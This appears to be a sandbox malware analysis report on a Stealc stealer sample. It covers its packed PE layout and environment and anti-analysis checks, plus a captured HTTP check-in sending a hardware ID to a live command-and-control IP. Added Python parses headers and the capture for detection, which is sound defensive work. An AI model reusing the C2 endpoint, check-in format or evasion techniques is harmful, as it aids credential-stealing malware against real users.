http://185.215.113.206/c4becf79229cb002.phpbZ | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpJZ | 100% | Avira URL Cloud | malware
http://185.215.113.206/~ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.phpbZ | file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/~ | file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php7S | file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1425810310.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/J | file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/9 | file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpJZ | file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.php% | file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561592
Start date and time: 2024-11-23 21:07:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 18
• Number of non-executed functions: 121
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: file.exe
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
| file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php

Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 13.107.246.63
| file.exe | malicious | Amadey, Stealc, Vidar | 13.107.246.63
| file.exe | malicious | LummaC Stealer | 13.107.246.63
| http://elizgallery.com/js.php | malicious | Unknown | 13.107.246.63
| file.exe | malicious | LummaC Stealer | 13.107.246.63
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 13.107.246.63
| 17323828261cfef277a3375a886445bf7f5a834ebb1cc85e533e9ac93595cd0e56ebd12426132.dat-decoded.exe | malicious | XWorm | 13.107.246.63
| file.exe | malicious | LummaC Stealer | 13.107.246.63
| file.exe | malicious | LummaC Stealer | 13.107.246.63
| file.exe | malicious | LummaC Stealer | 13.107.246.63

Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
| file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.16
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | LummaC Stealer | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.944368801198697
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'787'392 bytes
MD5: 925d775a24989da8e83cabcd00fde1d3
SHA1: 73373f88fa6798ac4a4bc1566b62814deeb362de
SHA256: 362ede5e1060f28217d49706ced46a1bea1e175bf91c4a1457f921904b9bb32a
SHA512: f0866e412ba6733ba460eadcd01d76b5803d8ad17a9016ec0b1d5915de0e1360d3229e9a09c5ebe1911325029388645d68aeaec1ee78e5797b2c3f83d2a5dfc6
SSDEEP: 24576:EnHx9ww1LObpvbxoW+VeB8GjF+gQBYn1m3aTgd+2VUUNLaNRDxceeZF/6YIKt:ER9wm6doW/6kk4vTwVUsLGmy5
TLSH: 6385333C4D93C812E80A4DFA2729B3974FB6929120A55C37B53603F9987768CB47B9C7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa8c000 (a virtual address; RVA 0x68c000, which is the first byte of the .taggant section)
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE (no NX_COMPAT; every code section is writable and executable anyway, see the section table)
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction at entry point: jmp 00007F3874B6ABFAh
Programming Language:
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
All other directories (EXPORT, EXCEPTION, SECURITY, DEBUG, COPYRIGHT, GLOBALPTR, TLS, LOAD_CONFIG, BOUND_IMPORT, IAT, DELAY_IMPORT, COM_DESCRIPTOR, RESERVED) | 0x0 | 0x0 | (none)
Note: the relocation directory is 8 bytes, the size of a single IMAGE_BASE_RELOCATION block header with no entries, yet DYNAMIC_BASE is set and the process below was loaded at 0x340000 instead of the preferred 0x400000; any fix-ups are therefore the packer stub's job rather than the loader's. The IAT directory is empty although an import directory exists.
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 8530a868d76e0b20c38ca075fac0af02 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 344bb85f29920a5eb9dd794b4b3f720d | False | 0.802734375 | data | 6.015078234354681 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a4000 | 0x200 | b431f82448f089e0d994bfb8fedd3459 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
chbioofn | 0x4f0000 | 0x19b000 | 0x19a800 | cc2fb367b218ec51c01ff30acf0d714d | False | 0.9947662911084044 | data | 7.953525251128387 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gsyzfhio | 0x68b000 | 0x1000 | 0x400 | 3a808a3ead8173cacf4f8026757e54ad | False | 0.81640625 | data | 6.391324828843364 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68c000 | 0x3000 | 0x2200 | 47854bc3fbc230530ff26336bdc29d79 | False | 0.07410386029411764 | DOS executable (COM) | 0.8008234098402712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Reading the table: the two unnamed sections reserve 2.4 MB and 2.7 MB of virtual space but carry only 0x16200 and 0x200 bytes on disk, which is where a packer unpacks into at run time; chbioofn holds 1.68 MB at entropy 7.95, i.e. the compressed or encrypted payload; and the entry point sits in .taggant, a section name used by the IEEE Taggant System that commercial protectors such as Oreans' Themida/WinLicense append. Five of seven sections are readable, writable and executable, which is what the "Detected unpacking (changes PE section rights)" and "Entry point lies outside standard sections" signatures above refer to.
Resources (Name | RVA | Size | Type | Language | Country | ZLIB Complexity):
RT_MANIFEST | 0x68a444 | 0x256 | ASCII text, with CRLF line terminators | (none) | (none) | 0.5100334448160535
Note: the manifest data at RVA 0x68a444 lies inside chbioofn (0x4f0000 to 0x68afff), not in .rsrc, which holds only the 0x2b0-byte resource directory.

Imports (DLL | Import):
kernel32.dll | lstrcpy
The import table names exactly one function; everything else the sample calls is resolved at run time (the GetPEB, LoadLibraryA and GetProcAddress chain in the execution graph below), which is why the import hash above is of little use for clustering.
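The section-table findings above (entry point inside .taggant, five RWX sections, two unnamed sections, one section near 8.0 bits of entropy, two sections whose virtual size dwarfs their raw size) can be reproduced with nothing but the standard library. The following Python is an added example, not code from Joe Sandbox or from the sample: it parses a PE header with struct, and, since the sample itself cannot be embedded here, it assembles a synthetic PE32 whose section headers copy the report's table. The section contents are constructed filler chosen to reproduce the reported entropy profile, the STANDARD_CODE_SECTIONS set and the 7.0-bit / 8x thresholds are assumptions, and the synthetic header fields are the only ones the checks read.

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Where a normal linker puts the entry point; an assumption, not Joe Sandbox's own list.
STANDARD_CODE_SECTIONS = {".text", ".code", "CODE", "INIT"}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniformly random)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(pe: bytes):
    """Read image base, entry-point RVA and the section table straight from the headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    magic, = struct.unpack_from("<H", pe, opt)
    entry_rva, = struct.unpack_from("<I", pe, opt + 16)
    if magic == 0x10B:      # PE32: ImageBase is a DWORD at +28
        image_base, = struct.unpack_from("<I", pe, opt + 28)
    elif magic == 0x20B:    # PE32+: ImageBase is a QWORD at +24
        image_base, = struct.unpack_from("<Q", pe, opt + 24)
    else:
        raise ValueError("unknown optional header magic")
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i           # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars, = struct.unpack_from("<I", pe, off + 36)
        sections.append({"index": i, "name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": entropy(pe[raw_ptr:raw_ptr + raw_size])})
    return image_base, entry_rva, sections


def label(s: dict) -> str:
    return s["name"] or f"(unnamed #{s['index']})"


def section_findings(pe: bytes) -> dict:
    """The section-level checks behind the report's verdicts: entry point outside a standard
    code section, RWX sections, unnamed sections, near-8.0 entropy, virtual size >> raw size."""
    base, entry, secs = parse_pe(pe)
    entry_sec = next((s for s in secs
                      if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"])), None)
    return {
        "entry_va": hex(base + entry),
        "entry_section": label(entry_sec) if entry_sec else None,
        "entry_outside_standard": entry_sec is None or entry_sec["name"] not in STANDARD_CODE_SECTIONS,
        "rwx": [label(s) for s in secs
                if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE],
        "unnamed": [label(s) for s in secs if not s["name"]],
        "high_entropy": [label(s) for s in secs if s["entropy"] > 7.0],          # threshold assumed
        "inflated": [label(s) for s in secs if s["vsize"] > 8 * max(s["raw_size"], 1)],  # likewise
    }


def build_pe(sections, entry_rva: int, image_base: int = 0x400000) -> bytes:
    """Assemble a minimal PE32 from (name, va, vsize, body, characteristics) tuples. Only the
    fields parse_pe() reads are meaningful; the rest of the optional header is zero-filled."""
    hdr_size, bodies, headers = 0x400, b"", []
    for name, va, vsize, body, chars in sections:
        raw = (len(body) + 0x1FF) & ~0x1FF       # FileAlignment 0x200, as in the sample
        headers.append(struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, va,
                                   raw, hdr_size + len(bodies), 0, 0, 0, 0, chars))
        bodies += body.ljust(raw, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x672FC34F, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 10, 0, 0, 0, 0, entry_rva, 0x1000, 0, image_base)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    head = dos + b"PE\0\0" + coff + opt.ljust(224, b"\0") + b"".join(headers)
    return head.ljust(hdr_size, b"\0") + bodies


def sample_layout() -> bytes:
    """Synthetic file whose section headers copy the report's table (names, RVAs, sizes, flags).
    The section contents are constructed filler that reproduces the reported entropy profile."""
    rng = random.Random(1561592)
    filler = b"\x90" * 0x19A800
    return build_pe([
        ("",         0x001000, 0x249000, filler[:0x16200],        RWX),
        (".rsrc",    0x24A000, 0x0002B0, filler[:0x200],          RW),
        (".idata",   0x24B000, 0x001000, filler[:0x200],          RW),
        ("",         0x24C000, 0x2A4000, filler[:0x200],          RWX),
        ("chbioofn", 0x4F0000, 0x19B000, rng.randbytes(0x19A800), RWX),
        ("gsyzfhio", 0x68B000, 0x001000, filler[:0x400],          RWX),
        (".taggant", 0x68C000, 0x003000, filler[:0x2200],         RWX),
    ], entry_rva=0x68C000)


if __name__ == "__main__":
    for key, value in section_findings(sample_layout()).items():
        print(f"{key}: {value}")
```

Run against the real file instead of the synthetic one with section_findings(open(path, "rb").read()); the entropy of chbioofn then comes out at the report's 7.95 rather than the 8.0 of random filler, and the inflated-section check is the quickest static tell that the two unnamed sections are the unpacking area.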
IDS alerts (Timestamp | SID | Signature | Severity | Source IP:Port | Dest IP:Port | Protocol):
2024-11-23T21:08:10.385909+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.9:49717 | 185.215.113.206:80 | TCP
TCP packets (Timestamp | Source IP:Port -> Dest IP:Port), one connection reused for both HTTP requests:
Nov 23, 2024 21:08:08.474339008 CET | 192.168.2.9:49717 -> 185.215.113.206:80
Nov 23, 2024 21:08:08.600605011 CET | 185.215.113.206:80 -> 192.168.2.9:49717
Nov 23, 2024 21:08:08.600699902 CET | 192.168.2.9:49717 -> 185.215.113.206:80
Nov 23, 2024 21:08:08.601119995 CET | 192.168.2.9:49717 -> 185.215.113.206:80
Nov 23, 2024 21:08:08.725519896 CET | 185.215.113.206:80 -> 192.168.2.9:49717
Nov 23, 2024 21:08:09.936844110 CET | 185.215.113.206:80 -> 192.168.2.9:49717
Nov 23, 2024 21:08:09.937000990 CET | 192.168.2.9:49717 -> 185.215.113.206:80
Nov 23, 2024 21:08:09.940475941 CET | 192.168.2.9:49717 -> 185.215.113.206:80
Nov 23, 2024 21:08:10.064090967 CET | 185.215.113.206:80 -> 192.168.2.9:49717
Nov 23, 2024 21:08:10.385710955 CET | 185.215.113.206:80 -> 192.168.2.9:49717
Nov 23, 2024 21:08:10.385909081 CET | 192.168.2.9:49717 -> 185.215.113.206:80
Nov 23, 2024 21:08:12.908488035 CET | 192.168.2.9:49717 -> 185.215.113.206:80
DNS answers (Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS):
Nov 23, 2024 21:08:01.301789999 CET | 1.1.1.1 | 192.168.2.9 | 0xd5b2 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
Nov 23, 2024 21:08:01.301789999 CET | 1.1.1.1 | 192.168.2.9 | 0xd5b2 | No error (0) | s-part-0035.t-0009.t-msedge.net | (none) | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Note: the only DNS traffic is for a Microsoft edge hostname. The C2 at 185.215.113.206 is contacted by literal IP and never resolved, so DNS-layer blocking or logging would not have caught the check-in; IP and HTTP-layer indicators are what apply here.
                                • 185.215.113.206
HTTP session 0: 192.168.2.9:49717 -> 185.215.113.206:80, PID 7644, C:\Users\user\Desktop\file.exe

Nov 23, 2024 21:08:08.601119995 CET | 90 bytes | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Nov 23, 2024 21:08:09.936844110 CET | 203 bytes | IN
HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 20:08:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Nov 23, 2024 21:08:09.940475941 CET | 413 bytes | OUT
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Body (211 bytes; CRLF line endings restored from the raw hex):
------JEHDHIEGIIIDHIDHDHJJ
Content-Disposition: form-data; name="hwid"

C32EB04998D23109973498
------JEHDHIEGIIIDHIDHDHJJ
Content-Disposition: form-data; name="build"

mars
------JEHDHIEGIIIDHIDHDHJJ--
Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 32 45 42 30 34 39 39 38 44 32 33 31 30 39 39 37 33 34 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d 0a

Nov 23, 2024 21:08:10.385710955 CET | 210 bytes | IN
HTTP/1.1 200 OK
Date: Sat, 23 Nov 2024 20:08:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Body: YmxvY2s= (raw 59 6d 78 76 59 32 73 3d), which is base64 for the string "block"

Reading the exchange: the GET / with an empty 200 reply is a reachability probe; the POST is the Stealc check-in, which sends a hardware ID (hwid) and a build tag (mars) as multipart form fields to a 16-hex-character .php endpoint. Neither request carries a User-Agent header, and both go to a literal IP over plain HTTP. The server's base64 "block" is the last application data in the session; no configuration, module download or exfiltration followed and no files were dropped (see the empty dropped-files section above), which is consistent with the C2 refusing to serve this client.
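As an added example that is not part of the report and not Stealc's or the IDS rule's code, the following Python parses the captured check-in body above, decodes the C2 reply, and lists the traits of the request a detection engineer would key on. The body, headers and reply are transcribed from the Data Raw lines above; the indicator list is a heuristic distilled from this single capture (an assumption), not the logic of ET SID 2044243.

```python
import base64
import re

# The check-in body and the C2 reply, transcribed from the "Data Raw" hex captured above
# (CRLF line endings restored). These are the sandbox's bytes, not constructed data.
BOUNDARY = "----JEHDHIEGIIIDHIDHDHJJ"
CHECKIN_PATH = "/c4becf79229cb002.php"
CHECKIN_HEADERS = {            # as captured; note that no User-Agent or Accept header is sent
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    "Host": "185.215.113.206",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
CHECKIN_BODY = (
    b"------JEHDHIEGIIIDHIDHDHJJ\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"C32EB04998D23109973498\r\n"
    b"------JEHDHIEGIIIDHIDHDHJJ\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"mars\r\n"
    b"------JEHDHIEGIIIDHIDHDHJJ--\r\n"
)
C2_REPLY = bytes.fromhex("59 6d 78 76 59 32 73 3d")   # the 8-byte response body

_NAME = re.compile(rb'name="([^"]*)"')


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body (RFC 7578 framing) into {field name: raw value}."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # "--boundary--" closes the body
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = _NAME.search(head)
        if m:
            fields[m.group(1).decode("ascii")] = value.rstrip(b"\r\n")
    return fields


def decode_reply(raw: bytes) -> str:
    """The server answers the check-in with a base64 string; return it decoded."""
    return base64.b64decode(raw, validate=True).decode("ascii")


def checkin_indicators(method: str, path: str, headers: dict, fields: dict) -> list:
    """Traits of this capture that a detection engineer would key on. This is a heuristic
    list distilled from the single exchange above, not the logic of ET SID 2044243."""
    hits = []
    if method == "POST" and re.fullmatch(r"/[0-9a-f]{16}\.php", path):
        hits.append("POST to /<16 lower-case hex chars>.php")
    if not any(k.lower() == "user-agent" for k in headers):
        hits.append("no User-Agent header")
    if headers.get("Content-Type", "").startswith("multipart/form-data"):
        hits.append("multipart/form-data body")
    if set(fields) == {"hwid", "build"}:
        hits.append("exactly the form fields hwid and build")
    if re.fullmatch(rb"[0-9A-F]{22}", fields.get("hwid", b"")):
        hits.append("hwid is 22 upper-case hex characters")
    return hits


def analyse_capture() -> dict:
    """Parse the captured exchange end to end: what was sent, what matched, what came back."""
    if len(CHECKIN_BODY) != int(CHECKIN_HEADERS["Content-Length"]):
        raise ValueError("transcribed body does not match the captured Content-Length")
    fields = parse_multipart(CHECKIN_BODY, BOUNDARY)
    return {
        "fields": {k: v.decode("ascii") for k, v in fields.items()},
        "indicators": checkin_indicators("POST", CHECKIN_PATH, CHECKIN_HEADERS, fields),
        "reply": decode_reply(C2_REPLY),
    }


if __name__ == "__main__":
    for key, value in analyse_capture().items():
        print(f"{key}: {value}")
```

The Content-Length check is deliberate: a transcription that drops a CRLF would still parse but would no longer be the bytes on the wire. Individually the indicators are weak (plenty of benign clients omit User-Agent), which is why the IDS rule fired on the POST and not on the earlier bare GET /.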



Target ID: 0
Start time: 15:08:03
Start date: 23/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x340000 (the preferred base 0x400000 was not used; the Yara source addresses and the execution-graph node addresses below are relative to 0x340000, so 0x341000 is the start of the first, unnamed section, the region the packer unpacks into)
File size: 1'787'392 bytes
MD5 hash: 925D775A24989DA8E83CABCD00FDE1D3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.6%
Total number of Nodes: 1406
Total number of Limit Nodes: 28

The rendered graph itself does not survive as text; what follows is the call structure recoverable from its node labels, with function addresses as the graph shows them (process image base 0x340000, so 0x341000 to 0x589000 is the first, unnamed section).

Entry chain (361bf0):
• 342a90 calls the helper 344a60 roughly forty times in a row, and 342e70 later calls it well over a hundred times more; each 344a60 call is RtlAllocateHeap followed by VirtualProtect, i.e. one fresh, re-protected allocation per call.
• 366390 then rebuilds the import table by hand: GetPEB, then either 3663d7 (20 API calls) or 3665c3 (LoadLibraryA x5), followed by a chain of GetProcAddress calls (366625, 366641, 366675, 366691, 3666ad). This is the behaviour behind "Contains functionality to read the PEB" and "Extensive use of GetProcAddress" above, and it explains the single static import.

Environment checks and check-in (361c03 to 361ea5), each with an ExitProcess branch:
• lstrcpy; GetSystemInfo -> ExitProcess on one branch.
• 341030: GetCurrentProcess, VirtualAllocExNuma -> ExitProcess if it fails; otherwise VirtualAlloc, VirtualFree, GlobalMemoryStatusEx -> ExitProcess on one branch, then GetUserDefaultLangID (the locale check named in the signatures).
• 362ad0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; 362a40: GetProcessHeap, RtlAllocateHeap, GetUserNameA; lstrlen/lstrcpy/lstrcat string assembly.
• OpenEventA, looping through CloseHandle, Sleep, OpenEventA while the named event exists, then CreateEventA (a single-instance guard).
• 361b20: GetSystemTime -> 361820 (string assembly) -> sscanf -> 342a20: SystemTimeToFileTime, SystemTimeToFileTime -> ExitProcess on one branch, i.e. a date comparison that can terminate the sample.
